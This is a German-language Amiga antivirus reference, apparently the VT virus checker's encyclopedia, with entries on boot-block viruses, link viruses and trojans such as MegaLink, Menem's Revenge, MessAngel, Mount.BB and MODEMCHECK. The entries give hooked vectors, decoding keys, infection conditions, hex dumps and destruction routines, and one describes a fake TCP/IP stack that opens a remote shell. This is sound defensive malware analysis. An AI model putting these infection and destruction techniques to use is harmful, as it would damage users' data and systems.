GetMes, DisplayAlert KS 40.063: Ja Fordert trackdisk.device NICHT Schreibt immer DOS0-BB Versucht einen sauberen BB vorzuzeigen. Grosser Teil des BB.s codiert. Das Codierbyte aendert sich mit jedem Schreiben. Decodiert mit eor.b d0,(a0)+ ist im Speicher zu lesen: 08085468 65204d61 78206f66 20537461 ..The Max of Sta 724c6967 68742056 69727573 60393300 rLight Virus`93. Vermehrung: BB Schaeden: Ermittelt mit $DFF006 eine Blocknumer. Testet ob dieser Block mit #8 beginnt (also OFS), und schreibt diesen Block dann mit INSANE!! voll. Da ist dann leider NICHTS mehr zu retten. Block: 973 0000: 494e5341 4e452121 494e5341 4e452121 INSANE!!INSANE!! 0010: 494e5341 4e452121 494e5341 4e452121 INSANE!!INSANE!! usw.... Bei Tests mit DF1: wurde mehrmals (nachvollziehbar KS2.04) nicht ein Block gefuellt, sondern ein ganzer Track unlesbar. - MCA siehe Claas Abraham - MegaLink Link verlaengert ein File um 1044 Bytes Es wird ein neuer erster Hunk erzeugt ($FD) . KEINE verbogenen Vektoren. KS1.3 ja KS2.04 ja Mehrfachlinks: nein, da "schon verseucht"-Test Defekte Files: ja (Hunkstruktur defekt nur loeschen moeglich) Kennt nicht alle Hunktypen. Namensbegruendung: Decodiert mit eori.b #$f,(a1)+ ist im Speicher zu lesen: 7379733a 00007379 733a6300 646f732e sys:..sys:c.dos. 6c696272 61727900 4d656761 4c494e4b library.MegaLINK Vermehrung: Da keine Vektoren verbogen werden, muessen Sie ein verseuchtes Prg. starten und dieses Prg. versucht dann EINE Vermehrung. Beispiel: sie booten von der Festplatte und starten dann ein verseuchtes Prg. von DF0: . Das Linkteil wird dann versuchen, auf ihrer Festplatte (sys:) ein Prg. zu verseuchen. Wenn dies nun ein Befehl in sys:c ist, der beim Booten immer aufgerufen wird, so wird jedes Mal ein Vermehrungsversuch unternommen. Fuer die Vermehrung werden DosBefehle (info, examine, exnext usw.) verwendet. Ein Mehrfachlink duerfte nicht moeglich sein, da auf ein Langwort getestet wird. Die Nachbehandlungsroutine ist aufs Byte genau, mit ALLEN Fehlern von CCCP uebernommen. Deshalb koennen defekte Files entstehen. Vermehrungsbedingungen: File ausfuehrbar ($3f3) Filelaenge max. #15000 ($3a98) Disk validated ($52) Auf der Disk sind noch mind. 8 Bloecke frei. Fileerkennung mit VT getestet : 16.11.93 Ausbau mit VT getestet : 16.11.93 - MEGAMASTER Cool, DoIo, immer $7e300 zwei codierte Bereiche im BB 1. Bereich: eori.b #-$45,(a0)+ ; testet auf andere Viren 2. Bereich: eori.b #-$11,(a0)+ ; Textausgabe ueber Graphik schwarzer Hintergrund, rote Schrift Surprise!!! Your Amiga is controlled by MEGAMASTER Vermehrung: ueber BB - MegaMon siehe bei PP-Bomb - MeGaSUXX.TXT siehe bei Elien-Trojan - members.exe siehe bei IconD-Trojan - MemCheck v8.1 File anderer Name: Liberator virus v1.21 gepackt (PP): 6492 Bytes ungepackt: 10936 Bytes nicht resident nach Aufruf erfolgt Textausgabe: MEMORY CLEAR usw. mit SnoopDos kann man feststellen, dass : - versucht wird Sys:.FastDir zu oeffnen - Test ob MemCheck schon in Root - versucht wird startup-sequence zu oeffnen falls ja Eintrag in erste Zeile: MemCheck s Weiterhin ist im File zu lesen: Hello from the Liberator virus v1.21 Lets play trash the harddisk I`m outta here, kiss mine you lamer! DH0: , BLVC usw. Mit Festplatte: Es wird ein File .FastDir im Root-Verz. angelegt. Sobald im File der Wert $f erreicht ist, erfolgt die Textausgabe (s.o.) und der Computer stellt die Arbeit ein. Kreset wird not- wendig. - MemSearcher-Virus BB $6c, $80, immer ab $7EC00 Eine Speicherlupe bis $80000 im BB Da keine Vermehrung eigentlich von der Definition her kein Virus. Aber auf Grund der verbogenen Vektoren dringende Loesch- empfehlung. - MENEM'S REVENGE Link LoadSeg Haengt 2 Hunks (ist neu) an. Hunk 1 = $3E9 = CodeHunk Hunk 2 = $3EA = DataHunk Typ A: Verlaengert ein befallenes File um #3076 Bytes. Typ B: (PIF-Virus) Verlaengert ein befallenes File um #3124 Bytes. Auch mit KS2.04 Korrigiert dos.library mit SumLib. Ueberlaeuft $3E8-, $3F0- und $3F1-Hunks. Erzeugt einen Prozess mit Namen: " ",0 . Nach meiner Meinung ist der Kopf des 1. Segments von " " FALSCH. Wird ein schon befallenes File danach befallenen, so wird mit FindTask ueberprueft, ob der Prozessname schon da ist. Linkbedingungen: File kleiner als #60000 Erster CodeHunk enthaelt folgende Bytefolge NICHT: $286A0164 $700C4E095 (vgl. WB1.3 in c ask usw.) Linkablauf: Sie starten ein Programm. Menem "merkt" sich dieses Prg.. Sie starten ein neues Prg.. Jetzt erst linkt sich Menem an das alte Prg. Nachweis fuer Nicht-Ass-Benutzer mit SnoopDos. Linkergebnisse mit KS1.3: - gelinktes File ausfuehrbar (auch libs usw.) - gelinktes File NICHT ausfuehrbar (Hunks des OrigFiles nicht richtig behandelt, File bringt GURU) - File enthaelt nur noch Datenmuell (keine Rettung moeglich) Unter KS2.04 entstehen weniger defekte Files. Mit timer.device werden sechs Systemzeiten abgefragt. Textausgabe dann mit DisplayAlert. Dafuer wird ein Virusprogrammteil mit asr.l #1,d0 decodiert. dc.b 0,$50,$10,"MENEM'S REVENGE HAS ARRIVED !!!" dc.b 0,1,0," ARGENTINA STILL ALIVE",0,0 Hinweis: VT setzt LoadSeg zurueck, schreibt einige RTS in den Speicher, entfernt den Prozess " " auf Wunsch. Sie MUESSEN allerdings mit einem GURU rechnen !!!! Hinweis2: Bei den Datenmuellfiles kann VT NICHT mehr helfen. Fuer Ausbauversuche bei den anderen Filetypen verwenden Sie bitte eine Kopie der verseuchten Disk. VT versucht auch, die "falschen Hunks" wieder zu berichtigen. Hinweis3: Bedenken Sie bitte, dass inzwischen einige Programme auf dem Markt sind, die Loadseg verbiegen. Wurde Menems VORHER gestartet, so wird er "zugedeckt", bleibt ABER AKTIV !!!!!! Koennen Sie z.B. mit Snoopdos nachvollziehen. Meine Empfehlung: keine Programme verwenden, die LoadSeg patchen. - merry BBS-Trojan File Laenge ungepackt: 60356 Bytes Zerstoerungsprg. gegen BBS gerichtet. Keine verbogenen Vektoren 3-fach $4EB9-$4EF9-Link KS2.04 bei mir kein Intro 68000 bei mir kein Intro 68030+KS1.3 Kefrens-Intro und versuchter BBS-Zugriff. Braucht powerpacker.lib und explode.lib . VT bietet nur loeschen an. - MessAngel-Inst. File Keine verbogenen Vektoren, da nur RESET zugelassen wird. Verwendet Befehle von KS2.04, z.B. ColdReset Anderer Name: ELENI!-Inst. Laenge gepackt: 1808 Bytes Laenge ungepackt: 7100 Bytes Im entpackten File ist zu lesen: 61727900 00000000 7379733a 42007379 ary.....sys:B.sy 733a732f 73746172 7475702d 73657175 s:s/startup-sequ 656e6365 009b333b 33326d4d 65737341 ence..3;32mMessA 6e67656c 206b696c 6c657220 62792044 ngel killer by D 6f636b65 72206f66 20547769 7374210a ocker of Twist!. 9b303b33 316d9b34 43436865 636b696e .0;31m.4CCheckin 67207374 61727475 702d7365 7175656e g startup-sequen 63652e2e 2e0a0a9b 35435649 52555320 ce......5CVIRUS 464f554e 4420414e 44205245 4d4f5645 FOUND AND REMOVE 44212121 0a0a9b34 43526967 68742074 D!!!...4CRight t 6f206469 7361626c 65206672 6f6d206d o disable from m 656d6f72 79210a9b 34432d2d 2d2d2d2d emory!..4C------ Das Teil behauptet also im Cli, ein MessAngel-Viruskiller zu sein. In Wirklichkeit wird im Rootverzeichnis ein File mit dem Namen B abgespeichert. In der startup-sequence wird am Anfang "B",0a eingetragen. Abgespeichert werden IMMER #5000 Bytes. War Ihre startup- sequence laenger, so verlieren Sie Zeilen. War Ihre start- up-sequence kuerzer, so wird der Rest mit 0 aufgefuellt. Beim Loeschen der 1.Zeile in der startup-sequence kann es dann vorkommen, dass Ihr editor meldet "file contains bin- ary" und die Arbeit verweigert. Sie muessen dann auf einen anderen Editor ausweichen. Das Programm koennen Sie nur mit der r.MT = Reset verlassen. - MessAngel-B-Virus File Laenge: 1504 Bytes (immer ungepackt) Anderer Name: ELENI!-B-Virus Filename im Rootverzeichnis: B Wenn Cool-Vektor noch nicht verbogen, dann veraendere Cool- Vektor und dann ColdReset (KS2.04). Durch das Booten wird der MessAngel.BB-Virus geschrieben (s.u.) Das Teil wird immer aufgerufen, da es ja in der startup- sequence liegt. Falls Cool schon verbogen, dann verbogene Vektoren: Cool, DoIo, LoadSeg Das File besteht nur aus einem BB-Code, in dem mit $6000000E eingesprungen wird. - MessAngel.BB-Virus Verbogenen Vektoren: Cool, DoIo, LoadSeg Anderer Name: ELENI!.BB Im BB ist uncodiert zu lesen: 284118fc 004518fc 004c18fc 004518fc (A...E...L...E.. 004e18fc 004918fc 00216000 007a48e7 .N...I...!`..zH. Das Virusteil arbeitet teilweise mit absoluten Adressen ($F0, $124-$130 usw.). Ablauf: Ein Programm ruft DoIo auf: Zuerst wird nach -$1400(a6) das LW $4EEEFDD8 geschrieben. Ob da schon was wichtiges liegt, ist anscheinend unwichtig. Es war DoIo-Read: BB-Virus wird geschrieben (falls kein Schreibschutz) Es war DoIo-Write: Test ob LoadSeg schon verbogen. Falls ja, fuehre Orig.DoIo-Write aus. Falls nein, verbiege LoadSeg und dann Orig.DoIo-Write. Ein Programm ruft LoadSeg auf: - Test ob $DC002D schon 1: (nur bei einigen Amigas Uhr) Falls ja, wird LoadSeg der Name ELENI! uebergeben. Es fehlt zwar $0 am Schluss, aber was solls. Falls nein, Test auf Schreibschutz ($99) Rette Filename Laenge max 25+1 . Und wenn der Filename (+Pfad) laenger ist ??? Test auf Filelaenge max #100000 . Rette Filelaenge nach $F0 !!!!!! Suche im File bis zu einer bestimmten Tiefe nach LW $4EAEFDD8 (waere bei exec OpenLib, bei einer anderen Lib etwas anderes. Koennte aber zufaellig auch in einem gecrunchten File vorkom- men). Ersetze dieses LW durch $4EAEEC00. 4EEEFDD8 JMP -$0228(A6) 4EAEFDD8 JSR -$0228(A6) 4EAEEC00 JSR -$1400(A6) Schreibe File zurueck und dann Orig.LoadSeg . Das bearbeitete File koennte also laufen, solange das Virusteil im Speicher ist. Ohne Virusteil im Speicher sehen Sie sicher den GURU. VT findet solche veraenderte Files NICHT !!! Falls Sie also auf eine Disk mit MessAngel-Virus treffen und einige Files laufen nicht, dann nehmen Sie einen Filemonitor. Geben Sie als Suchstring $4EAEEC00 ein und ersetzen Sie das LW bei Bedarf durch $4EAEFDD8. Hinweis: Die Veraenderung kann in einem File MEHRFACH vorkommen. - METAMORPHOSIS V1.0 BB und Link auch KS2.04 immer ab $7FA72 Fordert trackdisk.device NICHT !!! Cold, DoIo, OldOpenLib, im Prg. noch Cool Im BB und im verseuchten File ist zu lesen: -METAMORPHOSIS V1.0- the next Generation from LAMER-EXTERMINATOR ! Schaeden: Sobald der Wert in der Zaehlzelle groesser als $14 ist, Kopfstep alle Laufwerke. NeuBoot dieser Disk ergibt bei mir einen Requester: Volume has a read/write error (Tracks defekt) nicht mehr viel zu retten. Vermehrung: mit DoIo = BB mit OldOpenLib = Link an File als 1.Hunk Linkbedingungen: - sucht c: (bei mir NUR da, steht auch so im Prg.) - und dann mit examine, exnext usw Files - kein Schreibschutz - File ausfuehrbar $3F3 - File kleiner #40000 - File noch nicht befallen Fuer die Hunk-Bestimmung nimmt das VirusPrg. die IRQ-Methode. Befallene Files sind lauffaehig . Verlaengert ein File um 1060 Bytes. KEIN Eintrag in startup-sequence . Keine Textmeldung des VirusPrg's . Ausbau mit VT getestet: 11.04.92 Hinweis: Da alle Files in c: verseucht sein koennen, sollten Sie ueberlegen, ob es nicht schneller ist, alle Files neu von c einer OrigWB-Disk zu kopieren. Dann brauchen Sie mit VT nur noch aus Files den Link-Hunk auszubauen, die auf der Orig-WB-Disk NICHT vorhanden waren. - MEXX SCA-Clone Text: Hello there... Here I'm again... I've infected ya Disx ! I'm a simple VIRUS and I came from a group called --- MEXX --- Yeah, reset now !!! Or I will infect more! - MGM89 anderer Name: MEGAMASTER s.o. - MG's Virus V1.0 (BB) auch mit KS2.04, aber NICHT mit 68030 KickTag, KickCheckSum, SumKickData, GetMes, BeginIo AddIntSer (5 = Vert. Beam) Codiert mit not.w (a1)+ Decodiert im Speicher zu lesen: MG's Virus V1.0 Meldet sich nicht. Taeuscht sauberen Bootblock vor bei verbogenen Vektoren Vermehrung bei: - Lesen oder schreiben Block 0 - Format Disk - Miami.21g Fake Filename: Miami.020 Laenge: 407596 Bytes Archivname: DC-MI21G.lha nach FileID: .________________ ____¦____ ( _____/__ - ------------- _/ ___/ _/\_ T ¬\_ · diGiTAL · .-\ ¦/ 7--7 l / · cORRUPTiON · | \____.-----¦ ¦----.____/------- - - - | ¯¯¯¯¯ ¯¯¯¯¯ | Miami 2.1g - MUI based TCP/IP stack | Cracked executables with fake keys! | `-[15/09/97]-------------------------[ 7eN ] Aber auf der Miami-Homepage war zu lesen: <p>Note: The current version 2.1g is identical to 2.1f except for a new version of MiamiRegister. If you are currently using 2.1f and have already registered then you do <em>not</em> need to download 2.1g.</p> Also gab es KEINE 2.1g-Version ????? Aktuell war im Nov. 97 die 2.1p-Version Die Gefahr duerfte also nur noch gering sein. Filevergleich: 2.1g-Fake 2.1f-Orig 64617920 73747265 day stre : 64617974 696d6520 daytime 616d2074 63702064 am tcp d : 73747265 616d2074 stream t 6f732062 696e2061 os bin a : 6370206e 6f776169 cp nowai 206e6577 636c6920 newcli : 7420726f 6f742069 t root i 7463703a 37373000 tcp:770. : 6e746572 6e616c00 nternal. 64617974 696d6520 daytime : 64617974 696d6520 daytime ;..... 49002456 45523a20 I.$VER: : 49002456 45523a20 I.$VER: 4d69616d 6920322e Miami 2. : 4d69616d 6920322e Miami 2. 31672028 31352e30 1g (15.0 : 31662028 33312e30 1f (31.0 392e3937 29004e6f 9.97).No : 382e3937 29004e6f 8.97).No ;..... 73656c65 63740000 select.. : 73656c65 63740000 select.. 594f2f0c 2f4e0004 YO/./N.. : 2f0c49f9 00008000 /.I..... 49f90000 80002f08 I...../. : 2f086100 fee8584f /.a...XO ;usw.... Schaden: (Fremdaussage) Ok guyz so this is supposed to be a dC release of Miami 2.1g...cept those guyz didn't do it What it IS however is a totally pathetic attempt to release a fake in order to gain access to machines it is run on. The concept is that some sucker runs this crap and then n e 1 can telnet or letnet to their port 13 and all going to plan the remote sys will get a juicy shell prompt to steal various goodies like Miami.default etc :) Now for the funny bit...this is so poorly done its the work of a braindead simpleton, and I'm not even sure that it works because of the implementation as there are a few things it relies on...yes thats right, it still needs some help :) - You must MANUALLY configure this version in Miami. - Importing previous settings or using MiamiInit stuffs up their plan (Methinks). - A rudimentary Miami Firewall screws it totally. - You have to be stupid enuff not to notice the CLI bit in the database settings Is all the above likey...hahaha....NO! So in summary...thanx to the guyz that did this, it made my somewhat boring and miserable day...I laughed for ages! - Later RaMoNsTeR :) Ich hoffe es gibt diese Version wirklich nicht im Original (siehe oben), sonst koennte es zu Fehlerkennungen kommen. VT bietet Loeschen an. - MicroSystems BB FastMem ja nur KS1.2 holt selbst Namen aus ROM (z.B. dos.library) Cool und Cold im Prg. bei Bedarf: AddTask, RemTask und DoIo Vermehrung: ueber BB Textausgabe ueber Graphikroutine unverschluesselt steht im BB: YOUR AMIGA IS INFECTED BY A NEW GENERATION OF VIRUS CREATED IN SWEDEN BY MICROSYSTEMS - MicroSystems-CBM BB Clone s.o. nur Text geaendert. 79726967 68746564 20627920 62696720 yrighted by big 205d830c 436f6d6d 6f646f72 65204147 ]..Commodore AG - Micro-Master ( noch ein SCA! ) - Minus-Hunklaenge (Fehlermeldung) VT glaubt beim Filetest ein File gefunden zu haben, das an der Stelle $14 den Wert $FFFFwxyz enthaelt. Nach meiner Meinung er- geben die vier F eine negative Hunklaenge und das ist nicht moeglich. Das File duerfte so unbrauchbar sein (ausprobieren). Entstehung: Moeglicherweise bei einem frueheren Virusausbau Abhilfe: Suchen Sie nach $3E9 (Hunkcode) und schreiben Sie das Langwort, das danach folgt, auch nach $14. Mit etwas Glueck ist das File danach wieder brauchbar. - MODEMCHECK-Virus File Installprogramm Laenge CrunchMania gepackt: 15516 Bytes Laenge ungepackt : 22252 Bytes Virusprogramm loadwb Laenge: 3604 Bytes Installablauf: Es werden angeblich verschiedene Modemleitungen getestet und die Ergebnisse in der Shell ausgegeben. Aber auch ohne Modem wurden bei mir alle Leitungen mit OK ausgegeben. In Wirklich- keit wird c/loadwb kopiert. Ein mitlaufendes Snoopdos-Programm wird abgeschaltet. Zerstoerungsablauf: Nach einem Reset muss loadwb neu geladen werden. Der loadwb- Befehl wird ausgefuehrt, wenn eine KS 36 oder hoeher vorliegt. Ausserdem wird IMMER ein Prozess Diskdriver.proc gestartet. Mit KS1.3 ist also nach diesem Befehl keine Arbeit auf der WB moeglich, wodurch jeder Benutzer gewarnt sein sollte. Bevor die Zerstoerung beginnt, werden noch einige Tests durchge- fuehrt: - ein Speicherbereich wird mit eori.b #$8E,d0 decodiert. Es ergibt sich S:HORSE Es wird nun versucht dieses File zu oeffnen. Falls ja, dann Programmende. Also wahrscheinlich ein Schutz fuer den Programmierer. - Ueber DosEnvec Test ob - mehr als 22 Sektoren >$16=#22=21+1¸ - oder mehr als 90 Zylinder HighCyl>$5a =#90=89+1 - oder mehr als 2 Koepfe falls nicht mindestens eine Bedingung erfuellt ist Abbruch Das Virusteil hat bei mir NIE sofort mit der Zerstoerung be- gonnen . DosDelay = $7530 = 10 Minuten Durch die Zerstoerungsroutine werden die Bloecke mit FUCK aufgefuellt. s.u. Es gibt leider KEINE Rettung fuer das Medium. Es bleibt nur Format. lZ 0 Bl 0 00: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK 10: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK 20: 4655434b 4655434b 4655434b 4655434b FUCKFUCKFUCKFUCK usw. Hinweis: Der Rigid-Bereich war nicht betroffen, da dieser Be- reich mit DosEnvec nicht erreicht werden kann. pZyl 0 Bl 0 RDSK-Bl ChS: ok 00: 5244534b 00000040 af6aa877 00000007 RDSK...@.j.w.... 10: 00000200 0000003a ffffffff 00000001 .......:........ 20: 00000002 ffffffff ffffffff ffffffff ................ 30: ffffffff ffffffff ffffffff ffffffff ................ 40: 000004fb 00000022 00000002 00000001 ......."........ 50: fffffffe 00000000 00000000 00000000 ................ 60: 00000000 00000000 00000000 00000000 ................ 70: 00000000 00000000 00000000 00000000 ................ 80: 00000000 00000043 00000001 000004fa .......C........ 90: 00000044 00000000 00000034 00000000 ...D.......4.... a0: 53795175 65737420 53513535 35202020 SyQuest SQ555 b0: 20202020 20202020 46354520 47565000 F5E GVP. c0: 00000000 47565053 43534928 23312129 ....GVPSCSI(#1!) d0: 00000000 414c4c00 00000000 00000000 ....ALL......... usw. Hinweis 2: VT versucht den Prozess abzuschalten. Da Prozesse im Amiga nur schwer abzuschalten sind, KANN es zu einem Ab- sturz kommen, MUSS aber nicht. Ich habe es 10x ohne Absturz geschafft, den AKTIVEN Prozess zu entfernen. Hinweis 3: Bitte vergessen Sie nicht, den Original-LoadWB-Be- fehl neu aufzuspielen, da VT nur loeschen fuer das Virusteil anbietet. Hinweis Feb 94: Es sind einige File mit dem Namen loader o. loadwb und der Laenge 3604 Bytes aufgetaucht. Aus der Laenge ist schon ab- zusehen, dass es sich um eine Umbenennung des loadwb-Virus- teils handelt. Ausserdem wurden einige Texte im File geaen- dert. MUESSEN von VT als Virus erkannt werden !! Zerstoerung loader Typ B: (DiskSalv 3.01 Loader ???) lZ 0 Bl 0 00: 444c5420 444c5420 444c5420 444c5420 DLT DLT DLT DLT 10: 444c5420 444c5420 444c5420 444c5420 DLT DLT DLT DLT Zerstoerung loader Typ C: lZ 0 Bl 0 00: 20544149 20544149 20544149 20544149 TAI TAI TAI TAI 10: 20544149 20544149 20544149 20544149 TAI TAI TAI TAI Zerstoerung loader Typ D: lZ 0 Bl 0 00: 4c414d45 4c414d45 4c414d45 4c414d45 LAMELAMELAMELAME 10: 4c414d45 4c414d45 4c414d45 4c414d45 LAMELAMELAMELAME Es ist leider KEINE Rettung moeglich. Hinweis 5: vgl. auch 666!-Trojan - Mongo09-BBS Einbruchswerkzeug in BBS siehe bei ZonderKommando 1 (Name nachvollziehbar) - Mongo51-BBS Einbruchswerkzeug in BBS siehe bei ZonderKommando 2 (Name nicht nachvollziehbar) - Morbid Angel Forpib-Clone s.o. nur sichtbarer Text und einige unwichtige Bytes wurden geaendert. - MOSH.1.0-BB-Virus anderer moeglicher Name: SILESIAN-BB-Virus Bitte NICHT mit anderen MOSH-BBen verwechseln !!!! Fordert trackdisk.device NICHT . KS2.04: ja Im Speicher immer ab $7F800 Belegt Speicher NICHT mit allocmem. Folge: Andere Programme (z.B. VT) koennen das Virusteil ueberschreiben. Dann stehen UNMOEGLICHE Werte in DoIo usw. . Ein GURU droht. Verbogen: DoIo, KickTag, KickCheckSum Mehrfach decodiert mit eori.b xy,(a1)+ ist zu lesen: 61727900 14a50a20 48455920 21202049 ary.... HEY ! I 604d2020 4d4f5348 20766572 73696f6e `M MOSH version 20312e30 004628c8 19464952 53542053 1.0.F(..FIRST S 494c4553 49414e20 56495255 53004632 ILESIAN VIRUS.F2 b9285772 69747465 6e206279 20746865 .(Written by the 20626573 74204d2e 472e0046 3c783253 best M.G..F<x2S 70656369 616c2067 72656574 696e6773 pecial greetings 20746f3a 20432e49 2e412e20 616e6420 to: C.I.A. and 4b2e4741 524c454a 00464664 3c426969 K.GARLEJ.FFd<Bii 69672066 75636b69 6e672074 6f3a204b ig fucking to: K 415a494f 20535445 494e484f 46462061 AZIO STEINHOFF a 6e642044 2e4b2e42 49540000 414e4420 nd D.K.BIT..AND 6e6f7720 53455249 4f555320 49204c4f now SERIOUS I LO 56452042 45415441 2042206d 79204245 VE BEATA B my BE 53542067 69726c20 46726965 6e642068 ST girl Friend h 61766520 796f7520 41494453 203f2069 ave you AIDS ? i 66206861 76652069 74206669 6e652069 f have it fine i 206f6c73 6f206861 7665206f 6e650007 olso have one.. Vermehrung: BB Textausgabe: DisplayAlert (HEY..) Schaeden in Abhaengigkeit von einer Zaehlzelle (#5): a) Schreibt BB-Virus b) Schreibt nach $6E000 (nur bei DD-Disk Rootblock) Text. Versuchen Sie mit DiskSalve zu retten, was noch zu retten ist. 414e4420 6e6f7720 53455249 4f555320 AND now SERIOUS 49204c4f 56452042 45415441 2042206d I LOVE BEATA B m usw. c) Zerstoert Block ab $2800 (Bl20+0=Bl21). Ein File das diesen Block verwendet, ist NICHT zu retten. Es handelt sich hierbei um ein codiertes Textteil. pZyl 0 Bl 20 beb1bbdf 919088df acbaadb6 b0aaacdf ................ b6dfb3b0 a9badfbd babeabbe dfbddf92 ................ 86dfbdba acabdf98 968d93df b98d969a ................ - MOSH1-BB Cool, nach Reset auch $68 immer ab $7C000 soll Virusdemo sein (so ein Schwachsinn) keine Vermehrung, codiert mit MOSH, eor.l d0,(a0)+ ueber $68 und in Abhaengigkeit von Zaehlzelle (Cmpi.l #$190,(a0)) Textausgabe ueber Graphikroutine: schwarzer Hintergrund, Gelbe Schrift MAFIA PLK usw da Endlosschleife Reset notwendig dringende Empfehlung: loeschen - MOSH2-BB s.o keine Vermehrung KS2.04: nach Reset Absturz Zusaetzlich nach reset oldopenlib verbogen und ueber displayAlert Textausgabe: Hey you old lame usw. Da keine Vermehrungsroutine eigentlich kein Virus Dringende Empfehlung: sofort loeschen - Mount-972-Virus siehe bei B.E.O.L.-LVirus - Mount.BB-Virus BB 1024 Bytes Fundort z.B.: CD-LSD1:A/Leisure/MultitaskingGames/cheatModeC.DMS (1.Ausgabe) Fordert trackdisk.device NICHT Cool, DoIo, SumKickData KS2.04 mit 68030: Ja Speicherlage: $7F400 oder $FE000 (wird mit #$4e70 getestet) Im BB ist zu lesen: 4cdf7fff 6000fe5a 01432f4d 6f756e74 L..`..Z.C/Mount 0000432f 44000000 00000000 00000000 ..C/D........... ;....... 4e75646f 732e6c69 62726172 79005359 Nudos.library.SY 533a432f 44000000 00000000 00000000 S:C/D........... Schaeden: - es wurde ein Lese-Zugriff mit DoIo versucht: - schreibt Virus-BB. - es wurde ein Schreib-Zugriff mit DoIo versucht: Test #$1111,$F80000 (gefunden=Abbruch) Test #$99,$320 (nicht gefunden=Abbruch) - versucht in C/Mount (Laenge 208 Bytes) anzulegen. - versucht in C/D (Laenge 1024 Bytes = Virus-BB) anzulegen. Diese Vorgehensweise ist neu !! Hinweis: Fehlerquelle Stand: Anfang April 94 Bei aktivem Mount.BB-Virus im Speicher erkennen einige Antivirus- programme "Gremlins-Virus" und versuchen die Original-Vektoren wieder zu setzen. Da die Vektorensicherung beim Mount.BB-Virus an einer anderen Stelle stattfindet, verursachen diese Prg.e einen Systemabsturz. Ich nehme an, dass der Fehler in den entsprechenden Programmen beim naechsten Update (Mai 94 ?) behoben wird. Hinweis: Dieser BB wird auch als ELENI-BB-Virus gefuehrt. Bitte verwechseln Sie den BB nicht mit dem ELENI-Clock-BB-Virus. Im BB des Mount.BB-Virus ist auch zu lesen: 464d464f 4a20584a 53565420 56322e32 FMFOJ XJSVT V2.2 Wenn Sie nun #1 von den Bytes abziehen, ergibt sich: 454c454e 49205749 52555320 56322e32 ELENI WIRUS V2.2 Im dt. Alphabet kommt halt vor X W und nicht V. - Mount.BB-Inst1 File Laenge: 66424 Bytes An ein gepacktes XCopy wurde mit der 4EB9-4EF9-Methode ein Virus- teil gelinkt. Diese Teil wird beim Aufruf von XCopy im Speicher installiert und aktiviert. VT bietet Ausbau an. Das verbleibende XCopy ist gepackt. Ob dieses XCopy (XCopy 4.93) echt ist, kann ich nicht beurteilen. Das Datum laesst auf eine ueberholte Version schliessen. Da Sie sowieso keine Raubkopie verwenden, besorgen Sie sich bitte die neueste Version bei der Vertreiberfirma. - Mount.BB-Inst2 Zwei Files in C - Mount Laenge: 208 Bytes - D Laenge: 1024 Bytes (BB-Virus-Data) VT sucht nach Mount und bietet Loeschen an. Falls VT Mount findet, wird ohne Rueckfrage auch nach dem File D gesucht, und bei Bedarf geloescht. Bitte spielen Sie danach von der Orig-WB-Disk den mount-Befehl neu auf. ABER ein Problem bei AKTIVEM Virusteil !!!!!!!!!!!! Das Programm "vergisst" einen Lock freizugeben. VT meldet beim Filetest Objekt in use . Das Teil kann also dann so nicht geloescht werden. Schnelle Abhilfe: Setzen Sie mit VT die Original-Vektoren. Booten Sie dann von einer SAUBEREN Diskette neu. Ein Booten von der Festplatte ist NICHT sinnvoll, da dann ja der Mount-Befehl aufgerufen wuerde. Loeschen Sie dann mit VT die beiden Files in c . Dieses Virusteil zeigt, dass es sinnvoll ist, den Rigid-BB oder den Rigid-Zylinder der Festplatte ab und zu auf eine leere Disk zu sichern. Dann ist im Schadensfall ein Zurueckspielen moeglich und ein Format Festplatte kann wahrscheinlich vermieden werden. Schadensverlauf: Fast in jeder startup-sequence wird der mount-Befehl aufgerufen. - Dieser falsche Mount-Befehl versucht nun SYS:C/D (=BB-Virus-Data) nach $7F000 in den Speicher zu laden. - Sprung nach $7F00C - Kopieren des Virus-BB nach $7F400 oder $FE000 - Verbiegen der Vektoren - usw. Die frueher vorhandenen Mount-Anweisungen werden von dem Virusteil (nur 208 Bytes) NICHT ausgefuehrt !!! - mount-Virus Laenge: 1072 KEINE verbogenen Vektoren reines Zerstoerungsprogramm KS1.3: NEIN GURU 3 KS2.04: JA laeuft aber unter KS2.04 mit ORIG-Mount-Befehl von KS1.3 . Guru-Fehler liegt im VirusPrg. Von der Definition KEIN Virus, da keine Vermehrung. Namensbegruendung: im File ist am Anfang zu lesen 633A c: 6D6F756E 74000000 00000000 00000000 mount........... Liegt in c: als mount Laenge 1072 Braucht in c:why . Wird von mount-Virus aufgerufen. Der why- Befehl ist ein umbenannter Original-Mount-Befehl. Die Version des Original-Mount-Befehls spielt keine Rolle. (wurde getestet) Den why-Befehl gibt es unter KS2.04 NICHT mehr in c: !!!! Ablauf: In jeder s-seq ist wahrscheinlich der mount-Befehl enthalten. mount aux usw. Das Virus-Mount-Prg. wird also gestartet. Das VirusPrg. sucht sich selbst (c:mount) und ueberprueft ob die Zaehlzelle im Prg. schon den Wert #20 erreicht hat. Wenn nein, wird der Zaehler um 1 erhoeht und zurueckgeschrieben (open, seek, read, write, close). KEINE Gefahr !!! Wenn ja : Zaehlerzelle = #20 Aufruf von c:why (= Orig.-mount) mit execute Suche in Liste nach DH (also keine Zerstoerung von df0: usw.) Info besorgen, Blockanzahl besorgen, allocmem leer Blocklaenge, Mit DoIo ueber Schleife jeden Block leer neu schreiben. Wenn fertig Motor aus. Suche in Liste naechstes DH . Sie koennen so ihre Festplatten ohne Probleme unbrauchbar machen. Tests wurden durchgefuehrt mit df0: gemountet als DH0: . Erfolg siehe oben Fileerkennung getestet mit VT : 28.09.92 Empfehlung: mount und why einfach loeschen und neu aufkopieren. Nachtrag 06.01.93: Ein User hat das Install-Programm gefunden. siehe bei SMBX-Mount Virus - Mount-2-Trojan File in s Clone Laenge: 784 Bytes Rest siehe oben bei Aibon2-Mount2-Clone - MsgTop V1.0 siehe oben Devil_11_B.Door Laenge gepackt: 13548 VT erkennt Imploder Laenge einmal entpackt: 17884 VT erkennt Devil_11 - MST-VEC Virus File s.o. CLP-Virus Clone2 oder DOOR BELLS - MST-Inte Virus File s.o. CLP-Virus Clone2 - muTAgeN1 ?? Codierteil Es ist ein Teil aufgetaucht, mit dem jeder Virus codiert wer- den kann. Ein Decodierheader mit VARIABLER Laenge wird danach vor das jetzt codierte Virusteil gehaengt. VT versucht (!?!?) den Decodierheader bei Filetest zu finden. Es koennte zu Fehlerkennungen kommen !!!!!! Ich waere Ihnen dankbar wenn Sie diese Files etwas genauer untersuchen 